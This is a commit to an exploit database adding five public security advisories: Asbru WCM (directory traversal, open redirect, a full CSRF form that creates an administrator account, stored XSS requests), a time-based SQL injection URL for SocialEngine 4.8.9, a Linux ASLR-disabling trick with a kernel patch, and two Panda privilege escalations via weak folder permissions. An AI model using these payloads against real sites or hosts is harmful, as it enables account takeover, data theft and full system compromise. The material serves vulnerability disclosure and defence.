DB: 2016-04-07

5 new exploits

Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities
SocialEngine 4.8.9 - SQL Injection
Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation
Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation
This commit is contained in:
Offensive Security 2016-04-07 05:01:52 +00:00
parent 60fd0ef490
commit 48af7fb829
6 changed files with 726 additions and 0 deletions

View file

@ -35888,3 +35888,8 @@ id,file,description,date,author,platform,type,port
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0

Can't render this file because it is too large.

445
platforms/jsp/webapps/39667.txt Executable file
View file

@ -0,0 +1,445 @@

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value="&#13;&#10;<TEST><&#47;TEST>&#13;&#10;" />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test&#64;testingus&#46;io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account&#32;Managers" />
<input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event&#32;Managers" />
<input type="hidden" name="usergroups" value="Financial&#32;Officers" />
<input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
<input type="hidden" name="usergroups" value="Human&#32;Resources" />
<input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
<input type="hidden" name="usergroups" value="Intranet&#32;Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press&#32;Officers" />
<input type="hidden" name="usergroups" value="Product&#32;Managers" />
<input type="hidden" name="usergroups" value="Registered&#32;Users" />
<input type="hidden" name="usergroups" value="Shop&#32;Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
<input type="hidden" name="usergroups" value="User&#32;Managers" />
<input type="hidden" name="usergroups" value="Website&#32;Administrators" />
<input type="hidden" name="usergroups" value="Website&#32;Developers" />
<input type="hidden" name="users&#95;group" value="" />
<input type="hidden" name="users&#95;type" value="" />
<input type="hidden" name="creators&#95;group" value="" />
<input type="hidden" name="creators&#95;type" value="" />
<input type="hidden" name="editors&#95;group" value="" />
<input type="hidden" name="editors&#95;type" value="" />
<input type="hidden" name="publishers&#95;group" value="" />
<input type="hidden" name="publishers&#95;type" value="" />
<input type="hidden" name="administrators&#95;group" value="" />
<input type="hidden" name="administrators&#95;type" value="" />
<input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
<input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
<input type="hidden" name="scheduled&#95;notify" value="" />
<input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
<input type="hidden" name="scheduled&#95;unpublish" value="" />
<input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
<input type="hidden" name="invoice&#95;name" value="Icebreaker" />
<input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
<input type="hidden" name="invoice&#95;address" value="nu" />
<input type="hidden" name="invoice&#95;postalcode" value="1300" />
<input type="hidden" name="invoice&#95;city" value="Neverland" />
<input type="hidden" name="invoice&#95;state" value="ND" />
<input type="hidden" name="invoice&#95;country" value="ND" />
<input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
<input type="hidden" name="invoice&#95;fax" value="" />
<input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
<input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
<input type="hidden" name="delivery&#95;name" value="" />
<input type="hidden" name="delivery&#95;organisation" value="" />
<input type="hidden" name="delivery&#95;address" value="" />
<input type="hidden" name="delivery&#95;postalcode" value="" />
<input type="hidden" name="delivery&#95;city" value="" />
<input type="hidden" name="delivery&#95;state" value="" />
<input type="hidden" name="delivery&#95;country" value="" />
<input type="hidden" name="delivery&#95;phone" value="" />
<input type="hidden" name="delivery&#95;fax" value="" />
<input type="hidden" name="delivery&#95;email" value="" />
<input type="hidden" name="delivery&#95;website" value="" />
<input type="hidden" name="card&#95;type" value="VISA" />
<input type="hidden" name="card&#95;number" value="4444333322221111" />
<input type="hidden" name="card&#95;issuedmonth" value="01" />
<input type="hidden" name="card&#95;issuedyear" value="2016" />
<input type="hidden" name="card&#95;expirymonth" value="01" />
<input type="hidden" name="card&#95;expiryyear" value="2100" />
<input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
<input type="hidden" name="card&#95;cvc" value="133" />
<input type="hidden" name="card&#95;issue" value="" />
<input type="hidden" name="card&#95;postalcode" value="1300" />
<input type="hidden" name="content&#95;editor" value="" />
<input type="hidden" name="hardcore&#95;upload" value="" />
<input type="hidden" name="hardcore&#95;format" value="" />
<input type="hidden" name="hardcore&#95;width" value="" />
<input type="hidden" name="hardcore&#95;height" value="" />
<input type="hidden" name="hardcore&#95;onenter" value="" />
<input type="hidden" name="hardcore&#95;onctrlenter" value="" />
<input type="hidden" name="hardcore&#95;onshiftenter" value="" />
<input type="hidden" name="hardcore&#95;onaltenter" value="" />
<input type="hidden" name="hardcore&#95;toolbar1" value="" />
<input type="hidden" name="hardcore&#95;toolbar2" value="" />
<input type="hidden" name="hardcore&#95;toolbar3" value="" />
<input type="hidden" name="hardcore&#95;toolbar4" value="" />
<input type="hidden" name="hardcore&#95;toolbar5" value="" />
<input type="hidden" name="hardcore&#95;formatblock" value="" />
<input type="hidden" name="hardcore&#95;fontname" value="" />
<input type="hidden" name="hardcore&#95;fontsize" value="" />
<input type="hidden" name="hardcore&#95;customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace&#95;sections" value="" />
<input type="hidden" name="index&#95;workspace" value="" />
<input type="hidden" name="index&#95;content" value="" />
<input type="hidden" name="index&#95;library" value="" />
<input type="hidden" name="index&#95;product" value="" />
<input type="hidden" name="index&#95;stock" value="" />
<input type="hidden" name="index&#95;order" value="" />
<input type="hidden" name="index&#95;segments" value="" />
<input type="hidden" name="index&#95;usertests" value="" />
<input type="hidden" name="index&#95;heatmaps" value="" />
<input type="hidden" name="index&#95;user" value="" />
<input type="hidden" name="index&#95;websites" value="" />
<input type="hidden" name="menu&#95;selection" value="" />
<input type="hidden" name="statistics&#95;reports" value="" />
<input type="hidden" name="sales&#95;reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>

143
platforms/linux/dos/39669.txt Executable file
View file

@ -0,0 +1,143 @@
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016
Description
We have fixed an old and very known weakness in the Linux ASLR implementation.
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.
Following are the steps to test whether your system is vulnerable or not:
1) Create a dummy program which shows its memory map:
#include <stdio.h>
int main(int argc, const char *argv[])
{
char cmd[256];
sprintf(cmd, "cat /proc/%d/maps", getpid());
system(cmd);
return 0;
}
2) Compile it:
$ gcc show_maps.c -o show_maps # In a i386 machine
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine
3) Run the application to check that ASLR is working
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
Now, we run the same test but setting the stack to unlimited:
$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.
Vulnerable packages
The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005.
Impact
An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge.
The wekaness
The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized.
The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():
static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}
The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
Exploit
To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
FIX
We have created a patch to fix this issue:
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}
/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
Discussion
Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch.
Hector Marco - http://hmarco.org

47
platforms/php/webapps/39668.txt Executable file
View file

@ -0,0 +1,47 @@
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.
A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

View file

@ -0,0 +1,46 @@
* CVE: CVE-2015-7378
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Security URL Filtering < v4.3.1.9
* Fixed Version: Panda Security URL Filtering v4.3.1.9
Description:
All Panda Security 2016 Home User products for Windows are vulnerable to privilege escalation, which allows a local attacker to execute code as SYSTEM from any account (Guest included), thus completely compromising the affected host.
Affected Products:
Panda Gold Protection 2016 v16.0.1
Panda Global Protection 2016 v16.0.1
Panda Internet Security 2016 v16.0.1
Panda Antivirus Pro 2016 v16.0.1
Panda Free Antivirus v16.0.1
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Technical Details:
By default all the aforementioned products install (current version:4.3.0.4), which creates a service named 'panda_url_filtering' that runs as SYSTEM.
The executable modules are by default installed in "C:\ProgramData\Panda Security URL Filtering" directory.
However, the ACLs assigned to the directory itself, and to the rest of the installed files, allow any user to modify those files and/or substitute them with malicious ones.
A local attacker can easily execute code with SYSTEM account privileges by modifying or substituting the main executable module of this service, 'Panda_URL_Filteringb.exe', which will run at the next reboot of the host.
Disclosure Log:
Vendor Contacted: 28/09/2015
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher

View file

@ -0,0 +1,40 @@
* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
Affected Products:
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
Technical Details:
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named as 'Panda Endpoint Administration Agent' is installed in the host. This service runs under the SYSTEM account. However, due to weak ACLs set to the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher